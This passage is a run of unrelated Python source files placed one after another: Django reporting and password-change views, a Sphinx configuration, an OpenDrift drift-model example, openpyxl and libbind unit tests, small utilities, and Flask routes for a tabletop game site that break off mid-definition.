@login_required(login_url='/login/')
def dr_monthly_report(request):
    """Distributor monthly report; shows a selected SR's accounts when posted."""
    login_id = request.session['user']
    distributor = ACL.objects.get(loginID=login_id).loginUser
    post_data = request.POST
    print(post_data)  # kept: original debug trace

    context = {
        'transcriber_name': distributor.name,
        'transcriber_id': distributor.id,
        'subscribers': ACL.objects.filter(distUser=distributor),
    }
    if 'sr' in post_data:
        sr = Consumer.objects.get(id=post_data['sr'])
        context['hasReport'] = True
        context['allTransaction'] = BuyerSellerAccount.objects.filter(seller=sr)
    else:
        context['hasReport'] = False
    return render(request, 'pages/Distributor/report_monthly.html', context)


@login_required(login_url='/login/')
def dr_due_report(request):
    """Distributor due report; shows a selected SR's dues when posted."""
    login_id = request.session['user']
    distributor = ACL.objects.get(loginID=login_id).loginUser

    context = {
        'transcriber_name': distributor.name,
        'transcriber_id': distributor.id,
        'subscribers': ACL.objects.filter(distUser=distributor),
    }
    post_data = request.POST
    if 'sr' in post_data:
        sr = Consumer.objects.get(id=post_data['sr'])
        context.update({
            'sell_transaction': Transaction.objects.filter(seller=sr),
            'dueTransactions': dueTransaction.objects.filter(seller=sr),
            'hasReport': True,
            'allBalance': BuyerSellerAccount.objects.filter(seller=sr),
        })
    else:
        context['hasReport'] = False
    return render(request, 'pages/Distributor/report_due.html', context)



@login_required(login_url='/login/')
def dr_report_sales_analysis(request):
    """Distributor sales-analysis page for a selected SR.

    When ``sr`` is posted, month/year come from POST (or default to today);
    otherwise an empty report shell is rendered.
    """
    login_id = request.session['user']
    distributor = ACL.objects.get(loginID=login_id).loginUser
    post_data = request.POST
    print(post_data)  # kept: original debug trace

    context = {
        'transcriber_id': distributor.id,
        'subscribers': ACL.objects.filter(distUser=distributor),
        'transcriber_name': distributor.name,
    }
    if 'sr' in post_data:
        shop_id = post_data['sr']
        context['shop_name'] = Consumer.objects.get(id=shop_id).name
        context['shop_id'] = shop_id
        context['hasReport'] = True
        if 'month' in post_data and 'year' in post_data:
            context['month'] = post_data['month']
            context['year'] = post_data['year']
        else:
            today = datetime.date.today()
            context['month'] = today.month
            context['year'] = today.year
    else:
        context['shop_name'] = 'Not Selected'
        context['hasReport'] = False
    return render(request, 'pages/Distributor/report_sales_analysis.html', context)


# Shop Module

@login_required(login_url='/login/')
def shop_monthly_report(request):
    """Monthly report for the logged-in shop: accounts as seller and buyer."""
    login_id = request.session['user']
    shop = ACL.objects.get(loginID=login_id).loginUser
    return render(request, 'pages/Shop/report_monthly.html',
                  {'transcriber_name': shop.name,
                   'allTransactionIn': BuyerSellerAccount.objects.filter(buyer=shop),
                   'allTransaction': BuyerSellerAccount.objects.filter(seller=shop)})


@login_required(login_url='/login/')
def shop_due_report(request):
    """Due report for the logged-in shop, in both seller and buyer roles."""
    login_id = request.session['user']
    shop = ACL.objects.get(loginID=login_id).loginUser

    context = {'transcriber_name': shop.name}
    # Shop as seller (outgoing side).
    context.update({
        'sell_transaction': Transaction.objects.filter(seller=shop),
        'dueTransactions': dueTransaction.objects.filter(seller=shop),
        'allBalance': BuyerSellerAccount.objects.filter(seller=shop),
    })
    # Shop as buyer (incoming side).
    context.update({
        'sell_transactionIn': Transaction.objects.filter(buyer=shop),
        'dueTransactionsIn': dueTransaction.objects.filter(buyer=shop),
        'allBalanceIn': BuyerSellerAccount.objects.filter(buyer=shop),
    })
    return render(request, 'pages/Shop/report_due.html', context)

@login_required(login_url='/login/')
def shop_report_sales_analysis(request):
    """Sales-analysis page for the logged-in shop.

    Month/year come from POST when both are supplied, otherwise they
    default to today's month and year.
    """
    login_id = request.session['user']
    shop = ACL.objects.get(loginID=login_id).loginUser

    post_data = request.POST
    print(post_data)  # kept: original debug trace
    if 'month' in post_data and 'year' in post_data:
        month = post_data['month']
        year = post_data['year']
    else:
        today = datetime.date.today()
        month = today.month
        year = today.year
    return render(request, 'pages/Shop/report_sales_analysis.html',
                  {'shop_name': shop.name,
                   'shop_id': shop.id,
                   'transcriber_name': shop.name,
                   'month': month,
                   'year': year})

# Consumer Module

@login_required(login_url='/login/')
def user_monthly_report(request):
    """Monthly report for the logged-in consumer (buyer side only)."""
    login_id = request.session['user']
    consumer = ACL.objects.get(loginID=login_id).loginUser
    return render(request, 'pages/Consumer/report_monthly.html',
                  {'transcriber_name': consumer.name,
                   'allTransactionIn': BuyerSellerAccount.objects.filter(buyer=consumer)})


@login_required(login_url='/login/')
def user_due_report(request):
    """Due report for the logged-in consumer (buyer side only)."""
    login_id = request.session['user']
    consumer = ACL.objects.get(loginID=login_id).loginUser
    return render(request, 'pages/Consumer/report_due.html',
                  {'transcriber_name': consumer.name,
                   'sell_transactionIn': Transaction.objects.filter(buyer=consumer),
                   'dueTransactionsIn': dueTransaction.objects.filter(buyer=consumer),
                   'allBalanceIn': BuyerSellerAccount.objects.filter(buyer=consumer)})


@login_required(login_url='/login/')
def change_password(request):
    """Change the logged-in user's password and render a role-specific page.

    On POST with matching passwords the Django auth password is updated and
    the role's index page is shown; otherwise the change_password form is
    re-rendered with an error message.

    Fixes over the previous version:
    - the GET + 'Buyer' branch omitted the 'text' context key, unlike every
      other branch (inconsistent template context);
    - an unrecognized user type left `display` unbound and raised
      UnboundLocalError at `return`; we now fall back to the Consumer pages;
    - the four-way copy/paste per role is collapsed into a lookup table.
    """
    post_data = request.POST

    user_name = request.session['user']
    user_object = ACL.objects.get(loginID=user_name).loginUser
    transcriber_name = user_object.name
    # auth username is derived from the last 9 digits of the phone number
    user = user_object.phone[-9:]
    wrong = False
    text = ''

    # Template directory per user role; unknown roles fall back to Consumer.
    template_dirs = {
        'Distributor': 'pages/Distributor/',
        'SR': 'pages/SR/',
        'Seller': 'pages/Shop/',
        'Buyer': 'pages/Consumer/',
    }
    page = 'change_password.html'

    if 'csrfmiddlewaretoken' in post_data:
        if post_data['password'] == post_data['re-password']:
            if User.objects.filter(username=user).exists():
                u = User.objects.get(username=user)
                u.set_password(post_data['password'])
                u.save()

                # Legacy marker recording that the password was changed
                # (stored in the repurposed number_of_child field).
                this_user = Consumer.objects.get(id=user_object.id)
                this_user.number_of_child = 'CHANGED !!!'
                this_user.save()

                # NOTE: `wrong` doubles as "show message" in the templates.
                wrong = True
                text = 'Password is successfully changed'
                page = 'index.html'
            else:
                wrong = True
                text = 'Something Wrong'
        else:
            wrong = True
            text = 'Passwords do NOT match. Please try again'

    directory = template_dirs.get(user_object.type.type_name, 'pages/Consumer/')
    return render(request, directory + page, {'transcriber_name': transcriber_name,
                                              'wrong': wrong,
                                              'text': text})

# -*- coding: utf-8 -*-
#
# Watermarks documentation build configuration file, created by
# sphinx-quickstart on Tue Apr  8 16:49:39 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys
import os

src_dir = os.path.join(os.path.dirname(__file__), '..', '..', 'src')
sys.path.insert(0, src_dir)
import watermarks


# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# autodoc pulls API documentation from docstrings in the `watermarks`
# package imported above (src/ was prepended to sys.path for this).
extensions = [
    'sphinx.ext.autodoc',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Watermarks'
copyright = u'2014, Vladimir Chovanec'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Both values track the package's __version__ (no separate short X.Y form).
# The short X.Y version.
version = watermarks.__version__
# The full version, including alpha/beta/rc tags.
release = watermarks.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'Watermarksdoc'


# -- Options for LaTeX output ---------------------------------------------

# All LaTeX settings are left at the Sphinx defaults.
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
  ('index', 'Watermarks.tex', u'Watermarks Documentation',
   u'Vladimir Chovanec', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# Single man page in section 1 (user commands).
man_pages = [
    ('index', 'watermarks', u'Watermarks Documentation',
     [u'Vladimir Chovanec'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
# NOTE(review): 'One line description of project.' is the sphinx-quickstart
# placeholder — fill in a real description.
texinfo_documents = [
  ('index', 'Watermarks', u'Watermarks Documentation',
   u'Vladimir Chovanec', 'Watermarks', 'One line description of project.',
   'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False

#!/usr/bin/env python
"""
Grid time
=============
"""

from datetime import timedelta
import numpy as np
from opendrift.readers import reader_global_landmask
from opendrift.readers import reader_netCDF_CF_generic
from opendrift.models.oceandrift import OceanDrift

# Seeding at a grid at regular interval
o = OceanDrift(loglevel=20)  # Set loglevel to 0 for debug information

# Current field from the NorKyst-800 test subset shipped with OpenDrift.
reader_norkyst = reader_netCDF_CF_generic.Reader(o.test_data_folder() +
    '16Nov2015_NorKyst_z_surface/norkyst800_subset_16Nov2015.nc')

#%%
# Landmask
# extent is presumably [lon_min, lon_max, lat_min, lat_max] — confirm
# against the reader_global_landmask documentation.
reader_landmask = reader_global_landmask.Reader(
                    extent=[4.0, 5.5, 59.9, 61.2])

o.add_reader([reader_landmask, reader_norkyst])

#%%
# Seeding some particles
# 10 x 10 grid of seed positions, flattened to 100 (lon, lat) pairs.
lons = np.linspace(4.4, 4.6, 10)
lats = np.linspace(60.0, 60.1, 10)
lons, lats = np.meshgrid(lons, lats)
lons = lons.ravel()
lats = lats.ravel()

#%%
# Seed oil elements on a grid at regular time interval
# 11 seedings in total: t = 0, 6, ..., 60 hours after the reader start.
start_time = reader_norkyst.start_time
time_step = timedelta(hours=6)
num_steps = 10
for i in range(num_steps+1):
    o.seed_elements(lons, lats, radius=0, number=100,
                    time=start_time + i*time_step)

#%%
# Running model for 60 hours
# 240 steps of 15 minutes each; output written hourly.
o.run(steps=60*4, time_step=900, time_step_output=3600)

#%%
# Print and plot results
print(o)
o.animation(fast=True)

#%%
# .. image:: /gallery/animations/example_grid_time_0.gif

# Copyright (c) 2010-2015 openpyxl


# package imports
from openpyxl.reader.strings import read_string_table

from openpyxl.tests.helper import compare_xml


def test_read_string_table(datadir):
    """Shared strings from sharedStrings.xml parse into plain text entries."""
    datadir.join('reader').chdir()
    with open('sharedStrings.xml') as src:
        strings = read_string_table(src.read())
    assert strings == ['This is cell A1 in Sheet 1', 'This is cell G5']


def test_empty_string(datadir):
    """An empty shared string is preserved as '' rather than dropped."""
    datadir.join('reader').chdir()
    with open('sharedStrings-emptystring.xml') as src:
        strings = read_string_table(src.read())
    assert strings == ['Testing empty cell', '']


def test_formatted_string_table(datadir):
    """Rich-text shared strings are flattened to plain strings."""
    datadir.join('reader').chdir()
    with open('shared-strings-rich.xml') as src:
        strings = read_string_table(src.read())
    assert strings == [
        'Welcome', 'to the best shop in town', "     let's play "]


def test_write_string_table(datadir):
    """Writing a string table reproduces the reference sharedStrings.xml."""
    from openpyxl.writer.strings import write_string_table

    datadir.join("reader").chdir()
    content = write_string_table(
        ['This is cell A1 in Sheet 1', 'This is cell G5'])
    with open('sharedStrings.xml') as expected:
        diff = compare_xml(content, expected.read())
    assert diff is None, diff

# simpleSound.py
# Plays audio files on Linux and Windows.
# Written Jan-2008 by Timothy Weber.
# Based on (reconstituted) code posted by Bill Dandreta at <http://www.velocityreviews.com/forums/t337346-how-to-play-sound-in-python.html>.

import platform

if platform.system().startswith('Win'):
    from winsound import PlaySound, SND_FILENAME, SND_ASYNC
elif platform.system().startswith('Linux'):
    from wave import open as waveOpen
    from ossaudiodev import open as ossOpen

    try:
        from ossaudiodev import AFMT_S16_NE
    except ImportError:
        # BUG FIX: the fallback referenced the undefined name `byteorder`
        # and the unimported module `ossaudiodev`, so it raised NameError.
        # Import both pieces explicitly and pick the native-endian format.
        from sys import byteorder
        from ossaudiodev import AFMT_S16_LE, AFMT_S16_BE
        AFMT_S16_NE = AFMT_S16_LE if byteorder == "little" else AFMT_S16_BE


def Play(filename):
    """Plays the sound in the given filename.

    On Windows playback is asynchronous (SND_ASYNC). On Linux the wave
    file is written to the OSS device /dev/dsp, which blocks until done
    — NOTE(review): not actually asynchronous there; confirm if callers
    rely on returning immediately.

    Playback is best-effort: any failure (missing file, bad wave data,
    busy audio device) is silently ignored.
    """
    if platform.system().startswith('Win'):
        PlaySound(filename, SND_FILENAME | SND_ASYNC)
    elif platform.system().startswith('Linux'):
        try:
            s = waveOpen(filename, 'rb')
            try:
                (nc, sw, fr, nf, comptype, compname) = s.getparams()
                data = s.readframes(nf)
            finally:
                # BUG FIX: close the wave file even if reading raises
                s.close()
            dsp = ossOpen('/dev/dsp', 'w')
            try:
                dsp.setparameters(AFMT_S16_NE, nc, fr)
                dsp.write(data)
            finally:
                # BUG FIX: release the audio device even if writing raises
                dsp.close()
        except Exception:
            # was a bare `except:`; keep best-effort semantics but stop
            # swallowing SystemExit/KeyboardInterrupt
            pass

# -*- coding: utf-8 -*-
# Copyright 2011 Christoph Reiter <reiter.christoph@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.

import os
import sys

if os.name == "nt" or sys.platform == "darwin":
    from quodlibet.plugins import PluginNotSupportedError
    raise PluginNotSupportedError

import dbus

from quodlibet import _
from quodlibet import app
from quodlibet.qltk import Icons
from quodlibet.plugins.events import EventPlugin


def get_toplevel_xid():
    """Return the X11 window id of the main window, or 0 if unavailable."""
    window = app.window.get_window()
    if window:
        try:
            return window.get_xid()
        except AttributeError:
            # not running on X11 (e.g. Wayland) — no xid to report
            pass
    return 0


class InhibitFlags(object):
    # Bit flags for the org.gnome.SessionManager Inhibit() call
    # (see SessionInhibit below; only IDLE is used by this plugin).
    LOGOUT = 1            # inhibit logging out
    USERSWITCH = 1 << 1   # inhibit switching users
    SUSPEND = 1 << 2      # inhibit suspending the session
    IDLE = 1 << 3         # inhibit the session being marked idle (screensaver)


class SessionInhibit(EventPlugin):
    """Asks the GNOME session manager to suppress the idle/screensaver
    action while a song is playing, releasing it again on pause."""

    PLUGIN_ID = "screensaver_inhibit"
    PLUGIN_NAME = _("Inhibit Screensaver")
    PLUGIN_DESC = _("Prevents the GNOME screensaver from activating while"
                    " a song is playing.")
    PLUGIN_ICON = Icons.PREFERENCES_DESKTOP_SCREENSAVER

    # org.gnome.SessionManager D-Bus endpoint used for Inhibit/Uninhibit.
    DBUS_NAME = "org.gnome.SessionManager"
    DBUS_INTERFACE = "org.gnome.SessionManager"
    DBUS_PATH = "/org/gnome/SessionManager"

    APPLICATION_ID = "quodlibet"
    INHIBIT_REASON = _("Music is playing")

    # Cookie returned by Inhibit(); None while no inhibition is held.
    __cookie = None

    def enabled(self):
        # If playback is already running when enabled, start inhibiting now.
        if not app.player.paused:
            self.plugin_on_unpaused()

    def disabled(self):
        # Drop any held inhibition when disabled mid-playback.
        if not app.player.paused:
            self.plugin_on_paused()

    def plugin_on_unpaused(self):
        # Acquire an idle inhibition, remembering the cookie for release.
        xid = dbus.UInt32(get_toplevel_xid())
        flags = dbus.UInt32(InhibitFlags.IDLE)

        try:
            bus = dbus.SessionBus()
            obj = bus.get_object(self.DBUS_NAME, self.DBUS_PATH)
            iface = dbus.Interface(obj, self.DBUS_INTERFACE)
            self.__cookie = iface.Inhibit(
                self.APPLICATION_ID, xid, self.INHIBIT_REASON, flags)
        except dbus.DBusException:
            # session manager unavailable — skip inhibition silently
            pass

    def plugin_on_paused(self):
        # Release the inhibition identified by the stored cookie, if any.
        if self.__cookie is None:
            return

        try:
            bus = dbus.SessionBus()
            obj = bus.get_object(self.DBUS_NAME, self.DBUS_PATH)
            iface = dbus.Interface(obj, self.DBUS_INTERFACE)
            iface.Uninhibit(self.__cookie)
            self.__cookie = None
        except dbus.DBusException:
            # on failure the cookie is kept, so a later pause can retry
            pass

#!/usr/bin/env python
#
# testlibbind_ns_msg.py - Unit tests for the libbind ns_msg wrapper
#
# This file is part of Strangle.
#
# Strangle is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Strangle is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Strangle; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

import sys, testutils, random
import unittest

from Strangle import libbind

class ns_msgTestCase(unittest.TestCase):
    """Tests for the wrapper around the libbind ns_msg struct"""

    def test000Exists(self):
        """Check that the ns_msg type object exists cleanly in the module"""
        assert libbind.ns_msg.__class__ is type

    def testInstantiate(self):
        """Check that the ns_msg type accepts the correct arguments"""
        # Too few arguments
        self.assertRaises(TypeError, libbind.ns_msg)
        # Too many arguments
        self.assertRaises(TypeError, libbind.ns_msg, 'one', 'two')

    def testNoticeInvalid(self):
        """Test whether the ns_msg type can handle bad data"""
        rng = testutils.rng
        for testNum in range(50):
            packetVal = rng.read(random.randrange(20, 80))
            self.assertRaises(TypeError, libbind.ns_msg, packetVal)

    def testParseValidQuery(self):
        """Test whether ns_msg initialization parses valid NS queries"""
        packetData = file("data/www.company.example-query").read()
        parsed = libbind.ns_msg(packetData)
        assert type(parsed) is libbind.ns_msg

    def testParseValidResponse(self):
        """Test whether ns_msg initialization parses valid NS queries"""
        packetData = file("data/www.company.example-response").read()
        parsed = libbind.ns_msg(packetData)
        assert type(parsed) is libbind.ns_msg

def suite():
    """Assemble the ns_msg test suite."""
    tests = unittest.makeSuite(ns_msgTestCase, 'test')
    result = unittest.TestSuite()
    result.addTest(tests)
    return result

# Run the full test suite when executed directly.
if __name__ == "__main__":
    unittest.main()

#! /usr/bin/env python3

'''
given a list of stock price ticks for the day, can you tell me what
trades I should make to maximize my gain within the constraints of the
market? Remember - buy low, sell high, and you can't sell before you
buy.

Sample Input
19.35 19.30 18.88 18.93 18.95 19.03 19.00 18.97 18.97 18.98

'''

import argparse


def parse_args():
    """Parse command-line arguments: one or more stock price ticks."""
    parser = argparse.ArgumentParser(description='easy 249')
    parser.add_argument('stock_prices', nargs='+',
                        help='prices of a given stock')
    return parser.parse_args()


def stock(stock_prices):
    """Print the most profitable buy/sell pair for the day's ticks.

    Per the challenge rules the sale must happen at least two ticks
    after the purchase (you cannot sell on the very next tick).
    """
    best = (0, 0, 0)  # (profit, buy_day, sell_day)
    n = len(stock_prices)
    for buy_day in range(n - 2):
        for sell_day in range(buy_day + 2, n):
            gain = stock_prices[sell_day] - stock_prices[buy_day]
            if gain > best[0]:
                best = (gain, buy_day, sell_day)
    max_profit, max_buy, max_sell = best
    print("max profit: %.2f from buy on day %d at %.2f sell on day %d at %.2f" %
          (max_profit, max_buy, stock_prices[max_buy], max_sell, stock_prices[max_sell]))


if __name__ == '__main__':
    args = parse_args()
    # ticks arrive as strings from the command line; convert before analysis
    stock([float(price) for price in args.stock_prices])

################################################################
# LiveQ - An interactive volunteering computing batch system
# Copyright (C) 2013 Ioannis Charalampidis
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
################################################################

import sys
import time

import logging
import jobmanager.io.agents as agents
import jobmanager.io.jobs as jobs

from jobmanager.config import Config
from peewee import fn

from liveq.models import Agent, AgentGroup, Jobs

# Setup logger
logger = logging.getLogger("teamqueue")

def processTeamQueue():
	"""
	This should be called periodically to check and schedule jobs pending for the
	particular team
	"""
	# TODO: scheduling logic not implemented yet; currently a no-op.
	pass


import random
import time

from flask import (
    request,
    session,
    flash,
    redirect,
    url_for,
    Response,
    render_template,
)

from NossiPack.Cards import Cards
from NossiPack.User import Userlist
from NossiPack.VampireCharacter import VampireCharacter
from NossiPack.krypta import DescriptiveError
from NossiSite.base import app as defaultapp, log
from NossiSite.helpers import checklogin


def register(app=None):
    if app is None:
        app = defaultapp

    @app.route("/setfromsource/")
    def setfromsource():
        checklogin()
        source = request.args.get("source")
        ul = Userlist()
        u = ul.loaduserbyname(session.get("user"))
        try:
            new = VampireCharacter()
            if new.setfromdalines(source[-7:]):
                u.sheetid = u.savesheet(new)
                ul.saveuserlist()
                flash("character has been overwritten with provided Dalines sheet!")
            else:
                flash("problem with " + source)
        except Exception:
            log.exception("setfromsource:")
            flash(
                "Sorry "
                + session.get("user").capitalize()
                + ", I can not let you do that."
            )
        return redirect(url_for("charsheet"))

    @app.route("/timetest")
    def timetest():
        return str(time.time())

    @app.route("/boardgame<int:size>_<seed>.json")
    @app.route("/boardgame<int:size>_.json")
    def boardgamemap(size, seed=""):
        if size > 100:
            size = 100
        rx = random.Random()
        if seed:
            rx.seed(str(size) + str(seed))

        def r(a=4):
            for _ in range(a):
                yield rx.randint(1, 10)

        def e(inp, dif):
            for i in inp:
                yield 2 if i == 10 else (1 if i >= dif else 0)

        def fpik(inp, pref="FPIK"):
            vals = list(inp)
            vals = [(v if v != 2 else (2 if sum(vals) < 4 else 1)) for v in vals]
            for i, p in enumerate(pref):
                yield '"' + p + '": ' + str(vals[i])

        def cell():  # i, j):
            difficulty = 8
            """6 + (
                (9 if i == j else
                 8)
                if i in [0, size - 1] and j in [0, size - 1] else
                (7 if j in [0, size - 1] else
                 (6 if j % 2 == 1 and (i in [0, size - 1] or j in [0, size - 1]) else
                  (5 if 0 < i < size - 1 else 8))))"""

            for li in fpik(e(r(), difficulty)):
                yield li

        first = True

        def notfirst():
            nonlocal first
            if first:
                first = False
                return True
            return False

        def resetfirst():
            nonlocal first
            first = True

        def generate():
            yield '{"board": ['
            for x in range(size):
                yield ("," if not first else "") + "["
                resetfirst()
                for y in range(size):
                    yield ("" if notfirst() else ",") + '{ "x":%d, "y":%d, ' % (
                        x,
                        y,
                    ) + ",".join(
                        cell(
                            # x, y
                        )
                    ) + "}"
                yield "]"
            yield "]}"

        return Response(generate(), mimetype="text/json")

    @app.route("/gameboard/<int:size>/")
    @app.route("/gameboard/<int:size>/<seed>")
    def gameboard(size, seed=""):
        if size > 20:
            size = 20
        return render_template("gameboard.html", size=size, seed=seed)

    @app.route("/chargen/standard")
    def standardchar():
        return redirect(
            url_for("chargen", a=3, b=5, c=7, abia=5, abib=9, abic=13, shuffle=1)
        )

    @app.route("/cards/", methods=["GET"])
    @app.route("/cards/<command>", methods=["POST", "GET"])
    def cards(command: str = None):
        """Serve the card page and handle deck-manipulation commands.

        GET  /cards/           -> serialized deck parts
        POST /cards/<command>  -> run <command> with JSON body {"parameter": ...}
        Any other combination falls through to rendering cards.html.
        The deck is always saved back, even on error (finally block).
        """
        checklogin()
        deck = Cards.getdeck(session["user"])
        try:
            if request.method == "GET":
                if command is None:
                    return deck.serialized_parts
            elif request.method == "POST":
                par = request.get_json()["parameter"]
                if command == "draw":
                    return {"result": list(deck.draw(par))}
                elif command == "spend":
                    return {"result": list(deck.spend(par))}
                elif command == "returnfun":
                    return {"result": list(deck.pilereturn(par))}
                elif command == "dedicate":
                    # parameter format is "card:dedication"; default empty dedication
                    if ":" not in par:
                        par += ":"
                    return {"result": list(deck.dedicate(*par.split(":", 1)))}
                elif command == "remove":
                    return {"result": list(deck.remove(par))}
                elif command == "undedicate":
                    # BUG FIX: this branch was also labelled "free", which made
                    # the real "free" branch below unreachable; it calls
                    # deck.undedicate(), so it is exposed as "undedicate" now.
                    # Materialize first so flashing cannot exhaust a generator.
                    messages = list(deck.undedicate(par))
                    for m in messages:
                        flash("Affected Dedication: " + m)
                    # BUG FIX: this return used to sit inside the loop above,
                    # so only the first message was ever flashed.
                    return {"result": "ok", "messages": messages}
                elif command == "free":
                    affected, message = deck.free(par)
                    messages = list(message)
                    for m in messages:
                        flash("Affected Dedication: " + m)
                    return {
                        "result": list(affected),
                        "messages": messages,
                    }
                else:
                    return {"result": "error", "error": f"invalid command {command}"}

            return render_template("cards.html", cards=deck)
        except DescriptiveError as e:
            return {"result": "error", "error": e.args[0]}
        except TypeError:
            return {"result": "error", "error": "Parameter is not in a valid Format"}
        finally:
            Cards.savedeck(session["user"], deck)

    @app.route("/chargen", methods=["GET", "POST"])
    def chargen_menu():
        """Show the character-generation dialog, or translate a submitted
        form into a redirect to the chargen route."""
        if request.method != "POST":
            return render_template("generate_dialog.html")

        form = dict(request.form)
        params = {
            "a": form["a"],
            "b": form["b"],
            "c": form["c"],
            "abia": form["abia"],
            "abib": form["abib"],
            "abic": form["abic"],
        }
        if form.get("vampire", None):
            # Vampire characters also carry discipline and background points.
            params["shuffle"] = 1 if form["shuffle"] else 0
            params["vamp"] = form["discipline"]
            params["back"] = form["back"]
        else:
            params["shuffle"] = 1 if form.get("shuffle", 0) else 0
        return redirect(url_for("chargen", **params))

    @app.route("/chargen/<a>,<b>,<c>,<abia>,<abib>,<abic>,<shuffle>")
    @app.route("/chargen/<a>,<b>,<c>,<abia>,<abib>,<abic>,<shuffle>,<vamp>,<back>")
